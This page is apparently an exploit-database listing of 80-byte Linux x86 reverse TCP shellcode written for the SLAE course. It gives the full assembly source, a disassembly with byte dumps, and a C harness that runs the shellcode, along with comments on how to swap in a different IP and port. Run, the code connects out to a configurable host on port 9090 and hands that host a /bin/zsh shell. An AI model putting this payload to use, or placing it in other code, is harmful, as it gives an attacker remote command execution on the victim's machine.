Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)



EKU-ID: 5768 CVE: OSVDB-ID:
Author: thryb Published: 2016-08-11 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
 
;
; Linux x86
; Author:  thryb
; Date:    21-07-16
; Purpose: Reverse /bin/zsh to TCP port 9090
; Size:    80 bytes
; ID:      SLAE-770
; Git:     https://www.github.com/thryb/SLAE-770
;
 
 
global _start
 
section .text
 
_start:
 
    xor eax, eax ; cleaning registers
    xor ebx, ebx
 
    ; 1 - create socket
        ; socket(AF_INET, SOCK_STREAM, 0);
        ; #define SYS_SOCKET      1               // sys_socket(2)
    push eax ; null terminate
    push byte 0x1 ; stack = 0, 1
    push byte 0x2 ; stack = 0, 1, 2 (0, SOCK_STREAM, AF_INET)
    mov al, 0x66 ; sys_socketcall = 102
    mov bl, 0x1 ; socketcall() socket = 1
    mov ecx, esp ; mv stack ptr into ecx
    int 0x80 ; init
 
    xchg esi, eax ; saving sockfd
    
    ; 2 - Connect
    ; connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr));
 
    mov al, 0x66 ; sys_socketcall = 102
    add ebx, 0x2 ; sys_connect = 3
    push 0xefffff7f ; 127.255.255.254 (ip2shell.py)
    push word 0x8223 ; 9090 (port2shell.py)
    push word 0x2 ; 2 AF_INET
    mov ecx, esp ; mv stack ptr to ecx
    push 0x10 ; addr leght 16
    push ecx ; ptr address
    push esi ; fd
    mov ecx, esp ;  mv final stack ptr to ecx
    int 0x80 ; init
 
    xchg eax, esi   ; save sockfd
 
        ; 3 - dup
        ; sys_dup2 = 63 = 0x3f
 
        xor ecx, ecx    ; NULL ecx
        add cl, 0x2     ; add 2 to counter
 
        dup2: ; STDIN, STDOUT, STDERR
                mov al, 0x3f    ; sys_dup2
                int 0x80        ; init
                dec cl          ; decrement counter
                jns dup2        ; Jump on No Sign (Positive)
 
    ; 4 - execve /bin/zsh
        ; normal execve shell exec
 
        push eax ; null
        push 0x68737a2f ; hsz/
        push 0x6e69622f ; nib/
    mov ebx, esp ; mv stack ptr to ebx
    push eax ; null
    push ebx ; push ptr addr
    mov ecx, esp ; mv new stack ptr to ecx
        mov al, 0xb     ; sys_execve (11)
        int 0x80        ; init
 
 
============================================================================================================
 
No NULL
 
./reverse-zsh-tcp-9090.bin:     file format elf32-i386
 
 
Disassembly of section .text:
 
08048060 <_start>:
 8048060:       31 c0                   xor    %eax,%eax
 8048062:       31 db                   xor    %ebx,%ebx
 8048064:       50                      push   %eax
 8048065:       6a 01                   push   $0x1
 8048067:       6a 02                   push   $0x2
 8048069:       b0 66                   mov    $0x66,%al
 804806b:       b3 01                   mov    $0x1,%bl
 804806d:       89 e1                   mov    %esp,%ecx
 804806f:       cd 80                   int    $0x80
 8048071:       96                      xchg   %eax,%esi
 8048072:       b0 66                   mov    $0x66,%al
 8048074:       83 c3 02                add    $0x2,%ebx
 8048077:       68 7f ff ff ef          push   $0xefffff7f
 804807c:       66 68 23 82             pushw  $0x8223
 8048080:       66 6a 02                pushw  $0x2
 8048083:       89 e1                   mov    %esp,%ecx
 8048085:       6a 10                   push   $0x10
 8048087:       51                      push   %ecx
 8048088:       56                      push   %esi
 8048089:       89 e1                   mov    %esp,%ecx
 804808b:       cd 80                   int    $0x80
 804808d:       96                      xchg   %eax,%esi
 804808e:       31 c9                   xor    %ecx,%ecx
 8048090:       80 c1 02                add    $0x2,%cl
 
08048093 <dup2>:
 8048093:       b0 3f                   mov    $0x3f,%al
 8048095:       cd 80                   int    $0x80
 8048097:       fe c9                   dec    %cl
 8048099:       79 f8                   jns    8048093 <dup2>
 804809b:       50                      push   %eax
 804809c:       68 2f 7a 73 68          push   $0x68737a2f
 80480a1:       68 2f 62 69 6e          push   $0x6e69622f
 80480a6:       89 e3                   mov    %esp,%ebx
 80480a8:       50                      push   %eax
 80480a9:       53                      push   %ebx
 80480aa:       89 e1                   mov    %esp,%ecx
 80480ac:       b0 0b                   mov    $0xb,%al
 80480ae:       cd 80                   int    $0x80
 
 
*/
 
#include<stdio.h>
#include<string.h>
 
unsigned char code[] = \
"\x31\xc0\x31\xdb\x50\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x96\xb0\x66\x83\xc3\x02\x68"
 
// Replace IP here (use ip2shell.py to generate IP).
"\x7f\xff\xff\xef"
// *****************
 
"\x66\x68"
 
// Replace port here (use port2shell.py to generate IP).
"\x23\x82"
// *****************
 
"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x96\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
main()
{
 
    printf("Shellcode Length:  %d\n", strlen(code));
 
    int (*ret)() = (int(*)())code;
 
    ret();
 
}